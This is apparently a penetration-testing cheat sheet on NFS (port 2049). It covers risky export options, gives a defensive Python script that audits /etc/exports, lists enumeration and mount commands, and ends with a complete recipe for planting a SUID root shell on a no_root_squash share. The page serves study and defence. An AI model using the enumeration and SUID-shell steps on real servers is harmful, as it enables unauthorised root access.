
NFS - 2049

The Network File System (NFS) is a distributed file system protocol that allows a user on a client computer to access files over a network much like local storage is accessed. It enables file sharing across different systems and platforms using a client-server architecture, commonly used in Unix/Linux environments.

  • Default port: 2049

Dangerous Permissions

# Check dangerous NFS options (from nmap scripts or /etc/exports info):
# - no_root_squash: root on client = root on server (dangerous)
# - insecure: accepts client requests from high source ports (>1024)
# - rw: write access
# - sync: sync write (safer)
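
A defender-side check for the options listed above, as an added example that is not part of the original page: it parses exports(5) text and reports entries where a risky option is in effect, marking rw together with no_root_squash as critical because that pair is what the SUID technique under Exploitation depends on. The sample file, host names and function names are constructed for illustration.

```python
import re

# Added example: risky option -> safe counterpart, from the option list above.
PAIRS = {"no_root_squash": "root_squash", "insecure": "secure",
         "rw": "ro", "async": "sync"}

def parse_exports(text):
    """Yield (path, client, options) for every client entry in exports(5) text."""
    for raw in text.replace("\\\n", " ").splitlines():   # join continued lines
        fields = raw.split("#", 1)[0].split()            # drop comments
        defaults = []
        for spec in fields[1:]:
            if spec.startswith("-"):    # "-opt,opt": defaults for later clients
                defaults = spec[1:].split(",")
                continue
            m = re.fullmatch(r"([^()]*)(?:\(([^()]*)\))?", spec)
            if m:                       # "(opts)" with no host means any client
                opts = [o for o in (m.group(2) or "").split(",") if o]
                yield fields[0], m.group(1) or "*", defaults + opts

def risky_options(opts):
    """Risky options in effect; the last of each risky/safe pair wins."""
    active = []
    for risky, safe in PAIRS.items():
        seen = [o for o in opts if o in (risky, safe)]
        if seen and seen[-1] == risky:
            active.append(risky)
    return active

def audit(text):
    """Return (path, client, risky, critical) for entries with risky options."""
    findings = []
    for path, client, opts in parse_exports(text):
        risky = risky_options(opts)
        if risky:   # critical: rw + no_root_squash, the pair SUID planting needs
            critical = {"rw", "no_root_squash"} <= set(risky)
            findings.append((path, client, risky, critical))
    return findings

# Constructed sample exports file, not taken from a real server.
SAMPLE = """\
/mnt/nfs    *(rw,no_root_squash,insecure)
/srv/docs   192.0.2.0/24(ro,sync,root_squash)
/srv/build  -rw,sync build1.example(no_root_squash) \\
            build2.example(ro)
"""

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

Run it against the contents of /etc/exports on the server; an explicit ro or root_squash later in the same option list cancels the earlier risky option, which is why build2.example is not reported.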

Enumeration

# Scan for RPC and NFS services
nmap -p111,2049 -sCV 10.10.10.10

# Script Scan with NFS Scripts
nmap --script "nfs*" -p111,2049 -sV 10.10.10.10

# List exported NFS shares
showmount -e 10.10.10.10

# Mount NFS share (nolock avoids locking issues)
mkdir mount-me
sudo mount -t nfs 10.10.10.10:/mnt/nfs ./mount-me -o nolock
cd mount-me

# Unmount
sudo umount ./mount-me

Exploitation

# Use SUID escalation if root access isn't squashed

# Compile statically linked SUID shell (so it runs without external libs)
echo -e '#include <stdlib.h>\n#include <unistd.h>\nint main() { setuid(0); system("/bin/sh"); return 0; }' > shell.c
gcc -static shell.c -o shell
chmod +s shell
cp shell mount-me/

# Now run the 'shell' binary from the shell to get a root shell.